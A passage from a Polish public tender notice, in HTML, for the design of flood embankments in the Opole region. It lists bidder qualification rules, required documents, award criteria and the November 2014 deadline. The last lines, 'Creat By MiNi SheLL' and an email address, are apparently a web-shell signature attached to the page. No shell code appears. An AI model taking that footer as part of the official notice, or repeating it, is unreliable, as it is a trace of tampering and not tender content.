b.	wskazanie podmiotu, na rzecz którego realizowane były usługi,
c.	wskazanie przedmiotu usługi,
d.	wskazanie wartości usługi,
e.	wskazanie daty wykonania (rozpoczęcia i zakończenia),
f.	numer decyzji (pozwolenia na budowę, pozwolenia na realizację inwestycji przeciwpowodziowej), nazwa organu wydającego decyzję
g.	datę uprawomocnienia się decyzji,
h.	opinię podmiotu wskazanego powyżej w pkt. b stwierdzającą, że usługi zostały wykonane należycie.

W przypadku, gdy zamawiający jest podmiotem, na rzecz którego usługi zostały wcześniej wykonane wykonawca nie ma obowiązku przedkładania dokumentów potwierdzających, że usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2)	Warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania niniejszego zamówienia będzie uznany za spełniony, jeżeli Wykonawca: 

wskaże do uczestniczenia w wykonaniu niniejszego zamówienia następujące osoby/podmioty wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nich czynności:
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy):

(1) Projektant  - posiadający:
	potwierdzone doświadczenie przy sporządzaniu dokumentacji projektowej obejmującej zakres:
o	budowy wałów przeciwpowodziowych co najmniej III klasy ważności zgodnie z Rozporządzeniem Ministra Środowiska z dn. 20 kwietnia 2007r. w sprawie warunków technicznych jakim  powinny odpowiadać  budowle hydrotechniczne  i ich usytuowanie (Dz. U. 2007 nr 86 poz. 579 z późn. zm.)

	uprawnienia budowlane do projektowania bez ograniczeń w specjalności budowle hydrotechniczne lub melioracje wodne, zgodnie z ustawą z dnia 7 lipca 1994 r.  Prawo budowlane oraz ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5, poz. 42 z póź. zm.), potwierdzone stosownymi decyzjami o których mowa w art. 12 ust. 2 (z uwzględnieniem art. 104) ustawy z dnia 7 lipca 1994 r. Prawo budowlane  (tekst jednolity Dz. U. z 2006 r. Nr 156 poz. 1118 z późniejszymi zmianami) lub inne ważne uprawnienia projektowe bez ograniczeń w specjalności budowle hydrotechniczne lub melioracje wodne do projektowania bez ograniczeń, wydane na podstawie wcześniej obowiązujących przepisów*

(2) Sprawdzający  - posiadający:

	potwierdzone doświadczenie przy sporządzaniu dokumentacji projektowej obejmującej zakres: 
o	budowy wałów przeciwpowodziowych co najmniej  III klasy ważności zgodnie z Rozporządzeniem Ministra Środowiska z dn. 20 kwietnia 2007r. w sprawie warunków technicznych jakim  powinny odpowiadać  budowle hydrotechniczne  i ich usytuowanie (Dz. U. 2007 nr 86 poz. 579 z późn. zm.)
	uprawnienia budowlane do projektowania bez ograniczeń w specjalności budowle hydrotechniczne lub melioracje wodne, zgodnie z ustawą z dnia 7 lipca 1994 r.  Prawo budowlane oraz ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5, poz. 42 z póź. zm.), potwierdzone stosownymi decyzjami o których mowa w art. 12 ust. 2 (z uwzględnieniem art. 104) ustawy z dnia 7 lipca 1994 r. Prawo budowlane  (tekst jednolity Dz. U. z 2006 r. Nr 156 poz. 1118 z późniejszymi zmianami) lub inne ważne uprawnienia projektowe bez ograniczeń w specjalności budowle hydrotechniczne lub melioracje wodne do projektowania bez ograniczeń, wydane na podstawie wcześniej obowiązujących przepisów *

*Wszystkie osoby będące obywatelami krajów członkowskich Unii Europejskiej, które Wykonawca wskaże do uczestniczenia w wykonaniu niniejszego zamówienia i od których wymagane są uprawnienia budowlane, winny posiadać decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w Rzeczypospolitej Polskiej funkcji technicznych w budownictwie w zakresie przedmiotu niniejszego zamówienia zgodnie z Ustawą z 18 marca 2008 r. o zasadach uznania kwalifikacji zawodowych nabytych w krajach członkowskich Unii Europejskiej (Dz. U. nr 63 z 2008 r. poz. 394).
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy  zobowiązani są przedłożyć: 
- wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, sporządzony według wzoru stanowiącego załącznik nr 3 do niniejszej IDW, oraz
- oświadczenie Wykonawcy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, sporządzone według wzoru stanowiącego załącznik nr 3a do niniejszej IDW</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie oceniany wspólnie z warunkiem potencjał techniczny</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek nie będzie oceniany</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Kadra wykonawcy - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Podano we wzorze umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> wzmiuw.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Zarząd Melioracji i Urządzeń Wodnych w Opolu
ul. Katowicka 55
45-061 Opole.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2014 godzina 09:00, miejsce: 1.	Ofertę należy złożyć w siedzibie Zamawiającego w Opolu, ul. Katowicka 55, pokój nr 1 (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie przewidziano do dofinansowania w ramach RPO WO 2014-2020.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com